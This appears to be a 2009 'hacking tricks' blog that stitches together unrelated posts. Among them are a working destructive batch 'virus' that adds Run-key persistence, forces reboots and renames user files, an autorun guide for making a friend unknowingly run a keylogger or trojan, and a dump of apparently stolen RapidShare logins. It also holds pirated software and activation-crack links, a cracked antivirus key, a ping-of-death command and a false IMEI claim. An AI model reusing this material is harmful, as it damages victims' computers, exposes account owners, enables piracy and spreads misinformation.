Thursday, October 15, 2009

DOS ATTACK

DOS ATTACK
A denial of service attack (DOS) is when an attacker can make a system unusable or significantly slow for legitimate users by overloading the resources, so that no one can access it. If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine by using denial of service attack. Do) is an attack designed to render a computer or network incapable of providing normal services. The most common DoS attacks will target the computer's network bandwidth or connectivity. Bandwidth attacks flood the network with such a high volume of traffic, that's all available network resources are consumed and legitimate user requests cannot get through. Connectivity attacks flood a computer with such a high volume of connection requests, that all available operating system resources are consumed and the computer can no longer process legitimate user requests. Not all service outages, even those that result from malicious activity, are necessarily denial-of-service attacks. Other types of attack may include a denial of service as a component, but the denial of service may be part of a larger attack. Illegitimate use of resources may also result in denial of service. For example, an intruder may use of an anonymous ftp area as a place to store illegal copies of commercial software, consuming disk space and generating network traffic. A denial of service attack can also destroy programming and files in a computer system. Although usually intentional and malicious, a denial of service attack can sometimes happen accidentally. A denial of service attack is a type of security breach to a computer system that does not usually result in the theft of information or other security loss.
DOS Attacks are of the following different types-:1. Those that exploit vulnerabilities in the TCP/IP protocols suite.2. Those that exploit vulnerabilities in the Ipv4 implementation.3 There are also some brute force attacks, which try to use up all resources of the target system and makethe services unusable.Before I go on with DOS attacks, let me explain some vulnerabilities in TCP/IP itself. Some common vulnerabilitiesare Ping of Death, Teardrop, SYN attacks and Land Attacks.Ping of DeathThis vulnerability is quite well known and was earlier commonly used to hang remote systems (or even force them toreboot) so that no users can use its services. This exploit no longer works, as almost all system administrators wouldhave upgraded their systems making them safe from such attacks.In this attack, the target system is pinged with a data packet that exceeds the maximum bytes allowed by TCP/IP,which is 65 536. This would have almost always caused the remote system to hang, reboot or crash. This DOS attackcould be carried out even through the command line, in the following manner:
The following Ping command creates a giant datagram of the size 65540 for Ping. It might hang the victim'scomputer:C:\windows>ping -l 65540TeardropThe Teardrop attack exploits the vulnerability present in the reassembling of data packets. Whenever data is beingsent over the Internet, it is broken down into smaller fragments at the source system and put together at thedestination system. Say you need to send 4000 bytes of data from one system to the other, then not all of the 4000bytes is sent at one go. This entire chunk of data is first broken down into smaller parts and divided into a number ofpackets, with each packet carrying a specified range of data. For Example, say 4000 bytes is divided into 3 packets,then:The first Packet will carry data from 1 byte to 1500 bytesThe second Packet will carry data from 1501 bytes to 3000 bytesThe third packet will carry data from 3001 bytes to 4000 by tesThese packets have an OFFSET field in their TCP header part. This Offset field specifies from which byte to whichbyte does that particular data packet carries data or the range of data that it is carrying. This along with the sequencenumbers helps the destination system to reassemble the data packets in the correct order. Now in this attack, a seriesof data packets are sent to the target system with overlapping Offset field values.
As a result, the target system is notable to reassemble the packets and is forced to crash, hang or reboot.Say for example, consider the following scenario-: (Note: _ _ _ = 1 Data Packet)Normally a system receives data packets in the following form, with no overlapping Offset values._ _ _ _ _ _ _ _ _(1 to 1500 bytes) (1501 to 3000 bytes) (3001 to 4500 bytes)Now in a Teardrop attack, the data packets are sent to the target computer in the following format:_ _ _ _ _ _ _ _ _(1 to 1500 bytes) (1500 to 3000 bytes) (1001 to 3600 bytes)When the target system receives something like the above, it simply cannot handle it and will crash or hang or reboot.SYN AttackThe SYN attack exploits TCP/IP's three-way handshake. Thus in order to understand as to how SYN Attacks work,you need to first know how TCP/IP establishes a connection between two systems. Whenever a client wants toestablish a connection with a host, then three steps take place. These three steps are referred to as the three-wayhandshake.In a normal three way handshake, what happens is that, the client sends a SYN packet to the host, the host replies tothis packet with a SYN ACK packet. Then the client responds with a ACK (Acknowledgement) packet. This will beclearer after the following depiction of these steps-:
1. Client --------SYN Packet--------------à HostIn the first step the client sends a SYN packet to the host, with whom it wants to establish a three-way connection.The SYN packet requests the remote system for a connection. It also contains the Initial Sequence Number or ISN of the client, which is needed by the host to put back the fragmented data in the correct sequence.2. Host -------------SYN/ACK Packet----------à ClientIn the second step, the host replies to the client with a SYN/ACK packet. This packet acknowledges the SYN packetsent by the client and sends the client its own ISN.3. Client --------------ACK-----------------------à HostIn the last step the client acknowledges the SYN/ACK packet sent by the host by replying with a ACK packet.These three steps together are known as the 3-way handshake and only when they are completed is a complete TCP/IP connection established.In a SYN attack, several SYN packets are sent to the server but all these SYN packets have a bad source IP Address.When the target system receives these SYN Packets with Bad IP Addresses, it tries to respond to each one of themwith a SYN ACK packet. Now the target system waits for an ACK message to come from the bad IP address.However, as the bad IP does not actually exist, the target system never actually receives the ACK packet. It thusqueues up all these requests until it receives an ACK message. The requests are not removed unless and until, theremote target system gets an ACK message. Hence these requests take up or occupy valuable resources of the targetmachine.To actually affect the target system, a large number of SYN bad IP packets have to be sent. As these packets have aBad Source IP, they queue up, use up resources and memory or the target system and eventually crash, hang orreboot the system.
Land AttacksA Land attack is similar to a SYN attack, the only difference being that instead of a bad IP Address, the IP address ofthe target system itself is used. This creates an infinite loop between the target system and the target system itself.However, almost all systems have filters or firewalls against such attacks.Smurf AttacksA Smurf attack is a sort of Brute Force DOS Attack, in which a huge number of Ping Requests are sent to a system (normally the router) in the Target Network, using Spoofed IP Addresses from within the target network. As andwhen the router gets a PING message, it will route it or echo it back, in turn flooding the Network with Packets, andjamming the traffic. If there are a large number of nodes, hosts etc in the Network, then it can easily clog the entirenetwork and prevent any use of the services provided by it.Read more about the Smurf Attacks at CERT: http://www.cert.org/advisories/CA-98.01.smurf.htmlUDP Flooding
This kind of flooding is done against two target systems and can be used to stop the services offered by any of thetwo systems. Both of the target systems are connected to each other, one generating a series of characters for eachpacket received or in other words, requesting UDP character generating service while the other system, echoes allcharacters it receives. This creates an infinite non-stopping loop between the two systems, making them useless forany data exchange or service provision.Distributed DOS AttacksDOS attacks are not new; in fact they have been around for a long time. However there has been a recent wave ofDistributed Denial of Services attacks which pose a great threat to Security and are on the verge of overtakingViruses/Trojans to become the deadliest threat to Internet Security. Now you see, in almost all of the above TCP/IPvulnerabilities, which are being exploited by hackers, there is a huge chance of the target's system administrator orthe authorities tracing the attacks and getting hold of the attacker. Now what is commonly being done is, say a group of 5 Hackers join and decide to bring a Fortune 500 company'sserver down. Now each one of them breaks into a smaller less protected network and takes over it.
So now they have5 networks and supposing there are around 20 systems in each network, it gives these Hackers, around 100 systemsin all to attack from. So they sitting on there home computer, connect to the hacked less protected Network, install aDenial of Service Tool on these hacked networks and using these hacked systems in the various networks launchAttacks on the actual Fortune 500 Company. This makes the hackers less easy to detect and helps them to do whatthey wanted to do without getting caught. As they have full control over the smaller less protected network they caneasily remove all traces before the authorities get there.Not even a single system connected to the Internet is safe from such DDOS attacks. All platforms Including Unix,Windows NT are vulnerable to such attacks. Even MacOS has not been spared, as some of them are being used toconduct such DDOS attacks.Don't skip any line if you did not understand... try your best to understand the concept. there is no shortcut for success, you have to work hard !!!

CONVERT RAM TO GRAPHICS CARD

CONVERT RAM TO GRAPHICS CARD



Virtual Graphics Card ->Play latest Games without Graphic Cards->Many times we are stuck up with a system that just doesn’t provide enough juice to run the latest game…the result being-->you either spend a pot of money (atleast Rupees 3500 or 70$) for getting the latest graphics card->or you just read reviews of games like Crysis , Far Cry on gamespot and feel like a noob,fully knowing that your system just won’t be able to support it....->Take heart ! Here’s a wicked software with which you can beat 128-256 MB of graphics card requirements with a very modest 1GB DDR2 RAM.link -> http: //www. ziddu. com/download/4104619/3danalyze...Remove spaces->What it does is,it uses a part of your RAM as Graphics card memory. For example,if you got 1GB DDR2 RAM,thenit’ll use 128MB of it as a Virtual Graphics card,and the remaining 896MB will be used as a regular RAM.->Cool right….so you can Virtually emulate NVIDIA GeForce TI 4600,NVIDIA GeForce FX 4900 ULTRA,ATi Radeon 8500,ATi Radeon 9800 PRO.

DISPLAY MESSAGE IN XP BEFORE IT LOADS

DISPLAY MESSAGE IN XP BEFORE IT LOADS

1. Go to Start->Run.2. On the Run window type regedit and press Enter.2.Navigate to the key HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows NT\CurrentVersion\Winlogon.3.Modify the key legalnoticecaption and write the name of the window you want to appear.4.Modify the key legalnoticetext with what you want the window to say.5.Restart your computer. ..!!..;s

ALL SOFTWARE COLLECTION

ALL SOFTWARE COLLECTION

PC TOOLS SOFTWAREDesktop Maestro v2.0.0.332File Recovery v6.2.0.16Firewall Plus v3.0.0.60Internet Security 2008Privacy Guardian v4.1.0.37Registry Mechanic v7.0.0.1010Spam Monitor v3.0.0.4Spyware Doctor v5.5.0.204Spyware Doctor with AntiVirus v5.5.204ThreatFire v3.0.14.16AntiVirus v3.6.0.34Download 138mb:http://rapidshare.com/files/98612139/PC_Tools_Software_AiO_-_baseball2525.isohttp://rapidshare.com/files/98612163/PC_Tools_Software_AiO_-_baseball2525.part1.rarhttp://rapidshare.com/files/98612157/PC_Tools_Software_AiO_-_baseball2525.part2.rarScan Before Installing
Utilities DVD 2008
Anti-Spyware* Ad-Aware 2007 Pro 7.0.2.6* HijackThis 2.0.2* Spy Sweeper 5.5.7.48* Spybot Search & Destroy 1.5.2* Spyware Blaster 3.5.1* Spyware Doctor 5.5.0.204* SUPERAntiSpyware Professional 4.0.0.1146Anti-Virus* AVG Anti-Virus 8 Pro* BitDefender Total Security 2008 v11.0.15* ESET NOD32 Antivirus 3.0.636.0* ESET NOD32 Smart Security 3.0* Kaspersky Internet Security 7.0.1.325* McAfee Total Protection 2008* Panda Antivirus 2008* Panda Internet Security 2008* Symantec Norton 360* ZoneAlarm Security Suite 7.0.462Applications* Acronis True Image 11 Build 8053 Home* Adobe DreamWeaver CS3 v9.0* Adobe Photoshop CS3 v10.0* Adobe Reader 8.1.2* CCleaner 2.0.5* Everest Ultimate Edition v4.20.1291b* FastStone Image Viewer 3.5* Google Earth Pro 4.2.205* IrfanView 4.10* Partition Magic 8 Pro* Picasa 2.7.37.36* Registry Booster 2.0.1107* Registry Mechanic 7.0.0.1010* Stardock - CursorXP- ObjectBar 2.1- ObjectDock Plus v1.90- SkinStudio Pro- WindowBlinds 6.0* WinImage 8.10.8100* Xplorer2 Pro 1.7.0.5
Audio & Video* iTunes 7.6.1* MusicMatch 10.00.4033* QuickTime Player 7.4.1.14* RealPlayer 11.0.0.431 Beta* VLC Media Player 0.8.6d* Winamp 5.52* Windows Media Player 11CD & DVD Tools* Alcohol 120% 1.9.7.6022* Ashampoo Burning Studio 7.21* CloneCD 5.3.0.1* CloneDVD 2.9.1.5* ConvertXtoDVD 2.2.3.258* CyberLink PowerDVD Ultra Deluxe 7.3.3516* DAEMON Tools Pro 4.10.218.0* DeepBurner 1.8.0.224* DVD Shrink 3.2* MagicISO 5.4.239* Nero Ultra Edition 8.2.8.0* PowerISO 3.9Chat* AIM 6.8.1.5 Beta* ICQ 6.0.6043* Pidgin (Gaim) 2.3.1* Trillian Pro 3.1.9.0* Windows Live Messenger 8.5.1302* Yahoo! Messenger 9.0.0.907 BetaCodecs* All in 1 Codecs 6.0.3.0* DivX Pro 6.8.0.19* K-Lite Codec Pack 3.75 Full* K-Lite Mega Codec Pack 3.7.0* Matroska Pack Full v1.1.2* QuickTime Alternative 2.4.0* RealPlayer Alternative 1.7.5* Vista Codec Package 4.5.8* XP CodecPack 2.3.4Data Compression* 7-Zip 4.57* WinACE 2.61* WinRAR 3.71* WinZIP 11.1
EXTRAS* GMail Account HDD 1.0.0.12* Hacha 3.5* Magical Jelly Bean KeyFinder 2.0.4* nVidia Drivers - WinXP 169.21- WinVista 169.25* Recuva 1.10.223* Unlocker 1.8.5* Your Uninstaller Pro 2008Firewalls* Agnitum Outpost Firewall Pro 2008* Comodo Firewall 3.0.18.309* ZoneAlarm Pro 7.0.462.0Internet* Ares 2.0.9* BitTorrent 6.0.2* Download Accelerator Plus 8.6.1.4* eMule 0.48a* Google Toolbar 5.0.1112.7760 (IE)* Kazaa 3.2.5* LimeWire Pro 4.17.1.1* uTorrent 1.7.7Internet Browsers* Avant Browser 11.5.21* Firefox 2.0.0.12* Internet Explorer 7.0.5730.13* Netscape Navigator 9.0.0.6* Opera 9.26* Safari 3.0.4 BetaService Packs* Windows VISTA x32 Service Pack 1 (KB936330) - ENG* Windows XP Service Pack 2 (KB835935) - ENG
System Tools*.NET Framework - Version 1.1- Version 2.0 SP1- Version 3.5* DirectX 9.0c (Nov 2007)* Flash Player 9.0.115.0* Java Runtime Environment 1.6.0.4* Shockwave Player 10.3.0.24Windows* Remove WGA* VISTA Tweaks (.Docx)* Windows Activation - Windows Vista x32 - Activator Bootloader for SP1- OEMTool- Windows XP ProDownload: 3.26 GB-ISO 3.64GB
hxxp://rapidshare[dot]com/files/97941682/UTILITIES_DVD_2008.part01.rarhxxp://rapidshare[dot]com/files/97956850/UTILITIES_DVD_2008.part02.rarhxxp://rapidshare[dot]com/files/97972544/UTILITIES_DVD_2008.part03.rarhxxp://rapidshare[dot]com/files/97988529/UTILITIES_DVD_2008.part04.rarhxxp://rapidshare[dot]com/files/98005155/UTILITIES_DVD_2008.part05.rarhxxp://rapidshare[dot]com/files/98023197/UTILITIES_DVD_2008.part06.rarhxxp://rapidshare[dot]com/files/98041486/UTILITIES_DVD_2008.part07.rarhxxp://rapidshare[dot]com/files/98058872/UTILITIES_DVD_2008.part08.rarhxxp://rapidshare[dot]com/files/98180656/UTILITIES_DVD_2008.part09.rarhxxp://rapidshare[dot]com/files/98235439/UTILITIES_DVD_2008.part10.rarhxxp://rapidshare[dot]com/files/98259726/UTILITIES_DVD_2008.part11.rarhxxp://rapidshare[dot]com/files/98277679/UTILITIES_DVD_2008.part12.rarhxxp://rapidshare[dot]com/files/98296444/UTILITIES_DVD_2008.part13.rarhxxp://rapidshare[dot]com/files/98301682/UTILITIES_DVD_2008.part14.rarhxxp://rapidshare[dot]com/files/98324068/UTILITIES_DVD_2008.part15.rarhxxp://rapidshare[dot]com/files/98326964/UTILITIES_DVD_2008.part16.rarhxxp://rapidshare[dot]com/files/98329599/UTILITIES_DVD_2008.part17.rarhxxp://rapidshare[dot]com/files/98348589/UTILITIES_DVD_2008.part18.rarhxxp://rapidshare[dot]com/files/98348143/UTILITIES_DVD_2008.part19.rarhxxp://rapidshare[dot]com/files/98467853/UTILITIES_DVD_2008.part20.rar
hxxp://rapidshare[dot]com/files/98486303/UTILITIES_DVD_2008.part21.rarhxxp://rapidshare[dot]com/files/98365011/UTILITIES_DVD_2008.part22.rarhxxp://rapidshare[dot]com/files/98372402/UTILITIES_DVD_2008.part23.rarhxxp://rapidshare[dot]com/files/98381438/UTILITIES_DVD_2008.part24.rarhxxp://rapidshare[dot]com/files/98391179/UTILITIES_DVD_2008.part25.rarhxxp://rapidshare[dot]com/files/98402309/UTILITIES_DVD_2008.part26.rarhxxp://rapidshare[dot]com/files/98414163/UTILITIES_DVD_2008.part27.rarhxxp://rapidshare[dot]com/files/98182429/UTILITIES_DVD_2008.part28.rarhxxp://rapidshare[dot]com/files/98182199/UTILITIES_DVD_2008.part29.rarhxxp://rapidshare[dot]com/files/98505554/UTILITIES_DVD_2008.part30.rarhxxp://rapidshare[dot]com/files/98019604/UTILITIES_DVD_2008.part31.rarhxxp://rapidshare[dot]com/files/98047167/UTILITIES_DVD_2008.part32.rarhxxp://rapidshare[dot]com/files/98072377/UTILITIES_DVD_2008.part33.rarhxxp://rapidshare[dot]com/files/97991077/UTILITIES_DVD_2008.part34.rarhxxp://rapidshare[dot]com/files/97980424/UTILITIES_DVD_2008.sfvREPLACE xx BY tt AND [dot] BY .Scan Before Installing
BitDefender v.0.99 AIO
BitDefender 10 Free Edition BitDefender 10 Unistall Tool BitDefender Antivirus 2008 V.32 bit y v.34 BitDefender Antivirus Plus 10 Build 247 BitDefender Internet Security 2008 BitDefender Internet Security 10BitDefender Mobilehttp://www.filefactory.com/file/ebd760/http://www.filefactory.com/file/593796/http://www.filefactory.com/file/62eccd/Scan Before Installing
AIO Antivirus 2008 by BenditooOSolo Antivirus 2008avast! 4.7 ProAVG 7.5 buld 516Bit Defender Total Security (Spanish)Panda Antivirus 2008ZoneAlarm Anti-virus 7.0.462.000ZoneAlarm Security Suite 7.0.462.000Kaspersky Internet Security 7.0.0.125Kaspersky Anti-Virus 7.0.0.125Rapidsharehxxp://rapidshare[dot]com/files/94910837/2367AA2008.part1.rarhxxp://rapidshare[dot]com/files/94911356/2367AA2008.part2.rarhxxp://rapidshare[dot]com/files/94910302/2367AA2008.part3.rar
Easysharehxxp://w13.easy-sharecom/1699699266.htmlhxxp://w13.easy-share[dot]com/1699699267.htmlhxxp://w13.easy-share[dot]com/1699699305.htmlMegauploadhxxp://www.megaupload[dot]com/?d=8BHEBKC6hxxp://www.megaupload[dot]com/?d=VVYQJCO4hxxp://www.megaupload[dot]com/?d=WGK6JTUGMediafirehxxp://www.mediafire[dot]com/?f0ddoyuyzvghxxp://www.mediafire[dot]com/?jjw01iu5wmkhxxp://www.mediafire[dot]com/?cceyzcuklnbREPLACE xx BY tt AND [dot] BY .Passwordwww.dl4all.com
Panda Internet Security 2008
Installation requirements* Processor: Pentium 300 MHz or faster.* RAM: 128 MB (256 MB recommended).* Hard disk: 270 MB free space.* Operating system: Windows Vista 32 & 64 bit, Windows XP 32 & 64 bit, Windows 2000.* Internet Explorer 6.0.* CD-ROM driveServices included* Tech Support by E-mail.* SOS Virus 24 hours.* Daily Updates against new Viruses.* Software Updateshttp://rapidshare.com/files/67251281/Panda_Internet_2008.rarPassword:Before Installing
All In 1 Photoshop 2008
The great Collection of All In One Photoshop Brushes,Styles, Gradients & Custom Shapeshttp://rapidshare.com/files/101715338/AIO_Photoshop_2008.rarScan Before Installing

CHECK MOBILE ORGINALITY

CHECK MOBILE ORGINALITY

Check Ur Mobile Phone Quality !! Must See !!Would you like to know your mobile is original or not?!!press *#06# on ur mobileAfter you enter the code you will see a new code contain 15 digits:43 4 5 6 6 1 0 6 7 8 9 4 3 5IF the digit number Seven & Eight is 02 or 20 that mean it was Assembly onEmirates which is very Bad qualityIF the digit number Seven & Eight is 08 or 80 that mean it¢s manufacturedin Germany which is not badIF the digit number Seven & Eight is 01 or 10 that mean it¢s manufactured inFinland which is GoodIF the digit number Seven & Eight is 00 that mean it was manufactured inoriginal factory which is the best Mobile Quality [Like N-Series] ...IF the digit number Seven & Eight is 13 that mean it was Assembly onAzerbaijan which is very Bad quality and very dangerous for health!!!

AVG SERIAL KEY FOR 10 YRS

AVG SERIAL KEY FOR 10 YRS


ENJOY.!!Key: 8MEH-REDSL-7ETEC-ULA8R-EAOKL-4EMBR-ACED

MAKING AUTORUN FROM CD

MAKING AUTORUN FROM CD

Alright, lets say that you have coded a great keylogger or trojan or virus something and you are ready to give it to your friend in a pen drive or a CD.. but you are not sure that your friend would double click on the .exe file.. that is, you're not sure if your friend would execute your code..now what?wanna make your code independent? want it to run by itself as soon as the pen drive or CD is inserted in the computer???if yes then just read this...1) You open notepad2) now you writ: [autorun]OPEN=INSTALL\Setup_filename.EXEICON=INSTALL\Setup_filename.EXENow save it but not as a .txt file but as a .inf file.But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi3) Now burn your CD with the autorun .inf file included.4) Now set the CD in you CD drive and wait for the autorun to begin..( or if nothing happens just double-click on the CD drive in "My Computer")

SYSTEM MELTDOWN VIRUS

SYSTEM MELTDOWN VIRUS



System MeltdownSave As A bat File:CRASHnet send * WORKGROUP ENABLEDnet send * WORKGROUP ENABLEDGOTO CRASHipconfig /releaseshutdown -r -f -t0echo @echo off>c:windowshartlell.batecho break off>>c:windowshartlell.batecho shutdown -r -t 11 -f>>c:windowshartlell.batecho end>>c:windowshartlell.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /fecho You Have Been Hackedecho @echo off>c:windowswimn32.batecho break off>>c:windowswimn32.batecho ipconfig/release_all>>c:windowswimn32.batecho end>>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho YOU HAVE BEEN HACKED BITCHREN *.DOC *.TXTREN *.JPEG *.TXTREN *.LNK *.TXTREN *.AVI *.TXTREN *.MPEG *.TXTREN *.COM *.TXTREN *.BAT *.TXTPAUSEPAUSE

RAPIDSHARE ACCOUNT 2010

RAPIDSHARE ACCOUNT 2010



login: obnaxiouspass: sevda01username = 6988408Password = pNBpxxfYb8Expiration date = Mon, 26. Oct 2009Traffic left = 12000 MBSecurity = SecuredUsername = 84858Password = 60458655Expiration date = Thu, 17. Sep 2009Traffic left = 12000 MBSecurity = SecuredUsername = 6436269Password = HUy8MW3aG3Expiration date = Thu, 10. Sep 2009Traffic left = 12000 MBSecurity = SecuredUsername = bmdylgPassword = b1m2d3ylgExpiration date = Thu, 6. Aug 2009Traffic left = 10883 MBSecurity = SecuredUsername = 5875548Password = tKy2xhNvCRExpiration date = Fri, 17. Jul 2009Traffic left = 12000 MBSecurity = SecuredLogin: 329027Password: 787287Login: crazylf1111Password: iori0362764266Login: madobPassword: 6971750Login: tcfyPassword: 6936746Login: 7816771Password: hemo1234new - working!!!login: 4575252password: Godzillalogin: 438401password: g6zqslogin: 187336password: 455438Login: 629938Password: 508894Login: 2001251Password: kWwgiGHTcZAccountid= camaris75Password= caronte13login : admin5pass :adminlogin = drugi79pass = dwadwa22accountid=takavarpassword=8661316accountid=7482907password=jSXC5Ppbaccountid=mujembepassword=nineinchnailss123#!Login: ShrekuPassword: GP9jCda2Account = 7898729Password = bonde917566936 - hhNVAMwZ7431002 - nYdUmxFGCougar1975 - Cougar1975miami2008 - miami20086436269 - HUy8MW3aG3bmdylg - b1m2d3ylg6876662 - pRmY7fw64K6377104 - 2m4ES7nuqA7566936 - hhNVAMwZmegatronx3 - 9740316296612 - Y3wSBpAlexjunior - q08hnJCBcarlosmsc - 9182954338172874 - gnzAhs92jamin58 - jamin58748510 - 787alex72 - alex721488106 - 7679434558009177 - ykFBuhj67198454 - A91Fmd0l1istasiak - stasiakintykam - intykam0_6127227 - 7nIqTpKkf*******************************END***********************************

BLUETOOTH HACKER

BLUETOOTH HACKER

Bluetooth technology is great, No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?). If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them. This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices. Discovering Bluetooth Devices BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification. BTCrawler -BTCrawler is a scanner for Windows based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Hacking Bluetooth Devices BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. UPDATE: Hey folks, due to massive response the download links to above Mobile Hacking Premium Pack were moved to our must-have downloads page which is only available to MakeUseOf subscribers. So you will need to subscribe before youcan get them. For the Subscribers : To get your free Mobile Hacking Premium just write comment with your email address that you have used to subscribe and the above Premium Pack will be mailed to you. You need to be a subscriber to get the premium pack. Before Sending the Premium Pack we will be checking for your Authenticity. You will Receive your Premium Pack within 24 hours. What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis.
DOWNLOAD 1


*******************************END***********************************

NOTEPAD TRICKS

NOTEPAD TRICKS


You might be using Notepad since long but there are few tricks which are still unknown to you.There few tricks which you can use in notepad. Well quite old but here is d complete collectionStep 1: Open NotepadStep 2: Write following line in the notepad.
this app can breakStep 3: Save this file as xxx.txtStep 4: Close the notepad.Step 5: Open the file again.Voilla!!or1> Open Notepad2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters3> DON'T hit enter at the end of the line.4> Save the file.5> Close Notepad.6> Reopen Notepad.7> Open the file you just saved.or1> Open a note pad2> Type Bush hid the facts3> Save that file,4> Close it5> Again open and see...NOTEPAD "world trade centre trick".. :
Did you know that the flight number of the plane that had hit WTC ...on 9/11 was Q33N ....Open your Notepad in ur computer and type the flight number i.e Q33N... Increase the Font Size to 72, Change the Font to Wingdings. U will be amazed by the findings.log trick !! make ur Notepad a diary !!
Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it. Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.WHY?The reason this happens:
In notepad, any other 4-3-3-5 letter word combo will have the same results. It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters~ cheers ~Changing Header and Footer
Ever printed the little text you wrote in Notepad? More often than not, the printout starts with “Untitled” or the filename at top, and “Page 1″ on bottom. Want to get rid of it, or change it? Click on File, Page Setup. Get rid of the characters in Header and Footer boxes, and write what you want as Header and Footer. Use the following codes.&l Left-align the characters that follow&c Center the characters that follow&r Right-align the characters that follow&d Print the current date&t Print the current time&f Print the name of the document&p Print the page numberPrint tree roota. Open NOTEPAD and enter {print tree root}b. After that hit enter and type C:\windows\systemc. After that hit enter and type {print C:\windows\system\winlogd. Hit enter and type 4*43″$@[455]3hr4~e. Then save the file as teekids in C:\windows\system.
*******************************END***********************************

MAKE A FREE CALL TO TELEPHONE AND MOBILE

MAKE A FREE CALL TO TELEPHONE AND MOBILE



Make free CALLS from computer on Telephone (100 % free) !Using this VOIP program, you can call landline numbers in any country for FREE.FreeCall is still a Freeware app but you only get 300 minutes a week. To bypass this restriction:Keep the setup.exe. Freecall’s protection system is quite flawed, when the program announces you cannot use any more minutes = Uninstall and reinstall and it will reset your 300 minutes which only takes a moment.A)You MUST make an account with the program when it loads up. Then when your logged in (it will say at the bottom: ‘The client is logged on’)B)Go to the dial pad TAB, ignore the on screen buttons, at the bottom type in your number and remember you need to add country codes at the beginning – NO spaces in the number either.C) And it does do all countries for free – i’ve used it from NZ to england, USA, Spain and Aussie and they used it back.D) If it didn’t work, you need to check your firewall settings etc, this is an obvious but a program like this needs full access.Argentina free*Australia free*Austria free*Belgium free*Canada free*Czech Republic free*Denmark free*France free*Germany free*Hong Kong (+mobile) free*Hungary free*India(landline+mobile)Ireland free*Italy free*Luxembourg free*Malaysia free*Netherlands free*New Zealand free*Norway free*Poland free*Portugal free*Puerto Rico (+mobile) free*Russian Federation free*Singapore free*Slovenia free*South Korea free*Spain free*Sweden free*Switzerland free*Taiwan free*United Kingdom free*United States (+mobile) free*You can call this country for free from all countries…Code:http://rapidsare.com/files/106603127/setupfreecall_2.rar

LOCK YOUR DRIVE AND FOLDER

LOCK YOUR DRIVE AND FOLDER


There are plenty of software which locks drives and folder to protect your confidential data. Why waste money on such tools when you can do it with a simple registry tweak? Here’s how: Caution: Before you attempt these tweaks, please make sure that you have a backup of your registry, just incase something goes wrong in the middle. Locking Folders:
Consider you want to lock a folder named XXXX in your E:\, whose path is E:\XXXX.
Now open the Notepad and type the following
ren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Where xxxx is your folder name. Save the text file as loc.bat in the same drive.
Open another new notepad text file and type the following
ren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxx
Save the text file as key.bat in the same drive.Steps to lock the folder:
